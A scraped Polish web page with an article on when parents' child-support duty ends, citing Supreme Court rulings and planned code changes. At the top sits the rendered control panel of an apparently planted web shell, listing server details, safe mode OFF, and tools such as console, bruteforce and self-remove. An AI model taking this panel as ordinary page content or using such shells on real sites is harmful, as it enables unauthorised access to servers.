W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 07:14:38
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.153.90
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Kiedy ustaje obowiązek alimentacyjny?
27.09.2008.
Rodzice mogą zostać zwolnieni z obowiązku troszczenia się o materialny, duchowy i fizyczny rozwój dziecka z chwilą uzyskania przezeń samodzielności, niekiedy utrzymanie tego obowiązku jest jednak usprawiedliwione. Obowiązującym kryterium w tym względzie jest więc kryterium samodzielności dziecka, a więc odpowiedź na pytanie, czy dziecko jest w stanie utrzymać się samodzielnie. Jeśli  bowiem nie jest, będzie to powodowało pozostawanie przezeń w niedostatku.
Przesłanką do powstania obowiązku alimentacyjnego jest zaś właśnie pozostawanie w niedostatku. Sąd Najwyższy wyjaśnił, że niedostatek występuje wtedy, gdy uprawniony nie może w pełni własnymi siłami z własnych środków zaspokoić swych usprawiedliwionych potrzeb.

Rodzice mają obowiązek dostarczać dziecku środków utrzymania i wychowania wówczas, gdy ukończyło już 18 lat, ale uczy się nadal i nie ma żadnych własnych źródeł dochodu. Świadczenie przysługuje dziecku bez względu na wiek, z tym że dziecko pełnoletnie powinno wykazać, że nie z własnej winy nie potrafi się jeszcze utrzymać bez pomocy rodziców. Rodzic może jednak odmówić płacenia alimentów bez względu na wiek dziecka wówczas, gdy ma ono własny majątek, z którego dochody mogą pokryć koszty jego utrzymania oraz wychowania.

Orzecznictwo dotyczące obowiązku alimentacyjnego uczącego się dziecka wyjaśnia, że dziecko które nie tylko osiągnęło pełnoletność, ale zdobyło również wykształcenie umożliwiające znalezienie pracy zarobkowej nie traci prawa do alimentów jeśli chce np. kontynuować naukę i zamiar ten jest usprawiedliwiony w dotychczas osiąganych wynikach w nauce (wyrok Sądu Najwyższego z 14 listopada 1997 r. III CKN 257/97).

Obowiązek alimentacyjny rodziców kończy się z chwilą, w której dziecko z reguły po uzyskaniu wykształcenia i przygotowania do określonego zawodu jest w stanie utrzymać się samodzielnie.
Planowane są zmiany w kodeksie rodzinnym i opiekuńczym w zakresie prawa alimentacyjnego. Projekt zmian w ustawie, której autorem jest Komisja Kodyfikacyjna Prawa Cywilnego trafił już do Sejmu.

Jeden z przepisów ma dać rodzicom możliwość uchylania się od płacenia alimentów na pełnoletnie dziecko.

Taka sytuacja będzie możliwa, gdy płacenie połączone jest z nadmiernym dla rodzica uszczerbkiem lub dziecko nie dokłada starań, do tego aby osiągnąć życiową samodzielność.

    Co wpływa na wysokość świadczenia

    - Kodeks rodzinny i opiekuńczy w licznych przepisach wyraża zasadę równej stopy życiowej rodziców i dzieci. Rodzice są więc zobowiązani zapewnić utrzymanie na takiej samej stopie życiowej, na jakiej sami żyją.Trudna sytuacja materialna rodziców nie zwalnia ich od konieczności świadczenia na potrzeby dzieci, chyba że takiej możliwości są pozbawieni całkowicie. Istnieje więc tutaj obowiązek dzielenia się nawet bardzo niskimi dochodami.

    - Wysokość alimentów zależy od uzasadnionych potrzeb dziecka oraz możliwości zarobkowych i majątkowych rodzica. Potrzeby dziecka są różne w zależności od jego wieku czy stanu zdrowia. Orzekając o wysokości alimentów sąd bierze pod uwagę aktualne potrzeby dziecka. Do usprawiedliwionych potrzeb dziecka od których zależy wysokość świadczenia należą wydatki na wyżywienie, mieszkanie, leczenie, odzież, środki higieny osobistej i środki wychowania. Z kolei możliwości zarobkowe rodzica do płacenia alimentów nie zawsze odpowiadają zarobkom, które faktycznie aktualnie uzyskuje.Możliwości te określa się nie według faktycznie osiąganych dochodów, ale według tego, jakie dochody może osiągać rodzic przy założeniu, że dokłada on wszelkich starań i swoje możliwości zarobkowe w pełni wykorzystuje.
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 1 gość
20.06.2018.